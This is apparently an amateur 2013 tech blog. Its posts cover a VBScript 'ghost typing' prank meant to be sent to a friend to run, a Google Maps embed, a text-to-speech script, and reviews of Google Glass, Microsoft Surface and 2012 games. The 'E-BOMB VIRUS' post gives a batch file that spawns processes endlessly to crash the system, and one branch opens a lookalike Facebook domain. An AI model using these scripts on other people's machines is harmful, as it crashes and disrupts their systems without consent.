Friday, 28 June 2013

Ghost typing

The below script will automatically type the hellow  "how are u "in your friends computer when
your friend opens the .vbs file

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Save it as “Anything.VBS” and send it.

proverb:

The shower smiles in a politician

Monday, 10 June 2013

THE CODE TOEMBED GOOGLE GEOCODE API TO YOUR WEBSITE

step1: copy and past the below code in  file manger of the free hosting site 

<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
    <marquee>enter and get your location</marquee>
    <title>Google Maps API Example: Simple Geocoding</title>
    <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAjU0EJWnWPMv7oQ-jjS7dYxSPW5CJgpdgO_s4yyMovOaVh_KvvhSfpvagV18eOyDWu7VytS6Bi1CWxw"
      type="text/javascript"></script> /* this is the api whcih connect to google mapss */
    <script type="text/javascript">

    var map = null;
    var geocoder = null;

    function initialize() {
      if (GBrowserIsCompatible()) {
        map = new GMap2(document.getElementById("map_canvas"));
        map.setCenter(new GLatLng(37.4419, -122.1419), 1);
        map.setUIToDefault();
        geocoder = new GClientGeocoder();
      }
    }

    function showAddress(address) {
      if (geocoder) {
        geocoder.getLatLng(
          address,
          function(point) {
            if (!point) {
              alert(address + " not found");/* if wrong address entered */
            } else {
              map.setCenter(point, 15);
              var marker = new GMarker(point, {draggable: true});
              map.addOverlay(marker);
              GEvent.addListener(marker, "dragend", function() {
                marker.openInfoWindowHtml(marker.getLatLng().toUrlValue(6));
              });
              GEvent.addListener(marker, "click", function() {
                marker.openInfoWindowHtml(marker.getLatLng().toUrlValue(6));
              });
     GEvent.trigger(marker, "click");
            }
          }
        );
      }
    }
    </script>
  </head>

  <body onload="initialize()" onunload="GUnload()"> /* this  line will intiliaze the geocode function */
    <form action="#" onsubmit="showAddress(this.address.value); return false"> /*this line  will display the address by getting the value from address.value on submit*/
      <p>
        Enter an address, and then drag the marker to tweak the location.
        <br/>
        The latitude/longitude will appear in the in of window after each geocode/drag.
      </p>
      <p>
        <input type="text" style="width:350px" name="address" value="413 Bazaar street, salem" />
        <input type="submit" value="Go!" />
      </p>
      <div id="map_canvas" style="width: 600px; height: 800px"></div>
    </form>

  </body>
</html>

Thursday, 6 June 2013

E-BOMB VIRUS

1. Click on Start-> Run -> NotePad.
2. Copy the following code.

@echo off
color 3
cls
msg * (E-BOMB)
cls
msg * (YOUR MSG HERE)
cls


:begin
goto %random% /*this command opens the process randomly*/

:1
start cmd.exe
goto begin 

:2
start notepad.exe /*this will open notpad */
goto begin 

:3
start explorer.exe
goto begin :4
start iexplore.exe
goto begin 

:5
start vlc.exe
goto begin 

:6
start chrome.exe "www.facebookz.com"
goto begin

3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat

If u run this ur system will crash because the above program opens multiple processes 


TO recover from a e-bomb open task manager and end the process tree of the filename.bat

Tuesday, 4 June 2013

Google Glass Demilsified

Weareable  device are now becoming more and more popular ex. sony smart watch.Google glass is smart glass which  gives all the features of a smartphone,desktop computer just through our vision .Google glass works on the principle of augmented reality .Augmented reality is the ability to project the surrounding environment with map or any other symbol etc. Augmented reality differs from virtual reality .Virtual reality  replaces the real world with stimulated world but augmentation is  just adding semantic context to the environment element  augmentation makes us more interactive to the environment. One of the cool features about google glass is it augments the real world with the help of our vision.

Google glass consist of:


  • cpu with gps 
  • projector & lense
  • camera
  • mic
  • battery 

cpu and gps:

cpu is used to drive the entire google glass by generating control signals  the input for the cpu is given through several sensors for ex: a temperature sensor is used to give input about the temperature  and the cpu is used to generate corresponding output google glass also consist of a Global Positioning System(gps) it gives details about the our location via a satellite.

projector & lense:

projector and lens are one of the important element of the google glass projector helps to augments the real world with layers the layers are semantic context that must be generated by the cpu or gps . The layers are projected to the prism  and the prism sends the visible light via the lense  to the environment .This is how the layers are projected to the real world.




camers:

The google glass is embeded with a camera the we can take photos and videos whenever we want .if we want to take a pic we can take a pic we can can say to the glass to take this pic and the pic will be take and we can store in memory .

Mic:

The mic makes the google say more interactive it informs the user about the output generated by the cpu via voice it makes the google  glass very very user friendly





Features of google glass:


  • Say "take a picture" to take a picture
  • Record what u see hands free
  • We can share what we record
  • We can ask what is in our mind(ex.what is the meaning of love)
  • We can also get directions





Monday, 1 April 2013

what to make ur computer speak?

Follow simple steps?
Step 1: copy the code  below


Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Step 2:past in notepad

Step3: save the file with the extensions .vbs which visual basic script file

Friday, 14 December 2012

After nexus10 by Google its now Microsoft turn

Microsoft surface

In tablets, the big guns have big names. Apple has its iPad 4 and Google has the Nexus 10. And, if Microsoft is to take on the might of Apple and Google in the tablet space with Windows 8, it needs a big name of its own.
So welcome Microsoft Surface. The new tablet isn't just the big poster boy for Windows 8, but  also for Windows RT too, the brand-new version of Windows 8 designed for ARM.


Description:
It boasts a distinctive design, helped by those unmistakable keyboard covers, enjoys a    10.6-inch widescreen display, and runs Windows 8, the most popular operating system on the planet.

Features:

1. USB port

Any look at the spec sheet will make this obvious, but the Surface RT has a full-size USB port. If you look at SRT as a Windows tablet then this is no surprise, but if you see it as a tablet-plus then USB is a sweet addition. Using it you can plug in a mouse, use any keyboard you want or, and this will almost certainly come in handy next time you are traveling, charge your phone.

Surface Keyboards


2. A super smart keyboard

One of the reasons that the Surface RT feels so much like a laptop is that it doesn’t feel complete without a keyboard attached. Whenever Microsoft demoed it the tablet had the Touch cover (very firmly) attached and they don’t even make a non-keyboard cover for it. So when you take the Surface RT out and you actually want to use it like a tablet with the cover flipped back, what stops you from typing? The keyboard detects that it’s backwards and won’t accept a button press.
Another clever feature is that the space bar doesn’t end where you think it does. Microsoft’s design team noticed that people tend to hit the space key on the bottom edge, which is fine for a standard key, but doesn’t cut it for a no-movement one, like that used on the Touch cover. Their solution was to extend the useable range of the key below where it normally would be. 

Surface kickstand

3. Hidden, but accessible microSD slot

Much like a metal kangaroo pouch, the Surface’s kickstand has a bunch of storage hidden behind it. On the right side of the tablet, behind the kickstand cover, is a microSD slot that can take in up to 64GB of storage. It’s easy to access, but even easier to just put a card in once and forget about it forever — you still have a USB slot so it’s more like permanent expansion than it is removable storage.
With the price of a 64GB microSD card you can get the Surface RT up to 128GB of storage. That’s a lot of music, movies, Office docs, and apps… at least once there are some apps worth downloading in the Windows store.

4. Angled camera

If you do much reading about the Surface RT you’ll notice the term “22 degrees” come up a lot. Microsoft was quite impressed that they figured out that a 22 degree angle would allow the rear-facing webcam to work normally while the tablet was tilted into kickstand mode. Of course Microsoft didn’t angle the forward-facing cam so if you want to do a video conference the cam is pointed uncomfortably at your chest, but at least your companion will have a great view of the room you’re in.
Surface connectors

5. Macho magnetic connectors

Microsoft must have identified one of the iPad’s weakness: the magnetic connector that holds on the smart cover (or any cover for that matter) isn’t strong enough. If you grab the iPad by the cover alone you’re liable to be stuck holding the cover a nothing else, but that’s not the case with the Touch and Type covers. These aren’t as easy to attach to the tablet, but they won’t come off unless you really, really want them to. The power connection is magnetic as well, and while it’s annoyingly tricky to get connected, it has quite a strong connection as well.







Most rated game of 2012 top five contenders for the award










The conclusion to one of the biggest most popular mainstream Action RPGs, Mass Effect 3 will not disappoint you if you’re a long time fan. If you aren’t, prepare to be assaulted by what could be the best action RPG this side of 2012 with one helluva story to boot.






The Darkness 2 is a blast from beginning to the end. Giving you a hefty dose of blood, gore and lots of the arcane, with a story that keeps you glued to your screen.




Max Payne 3 is a testament to fantastic game design and brilliant storytelling, with the right amount of grit and ham. Pulp at its best. This is the best that gaming gets on console.Surely all the people who love shooting game will get the Pulp at its best from this game





The war just got perfect-er. Think of it as a special club membership you buy, to get top priority service.Battlefield 3 Premium is as premium as war gets, stopping just short of taking your butler into war zones with fresh lemonade. 



Death’s road is a hard, long and bloody enjoyable one. Darksiders II should be on your shopping list. No questions.

Total Pageviews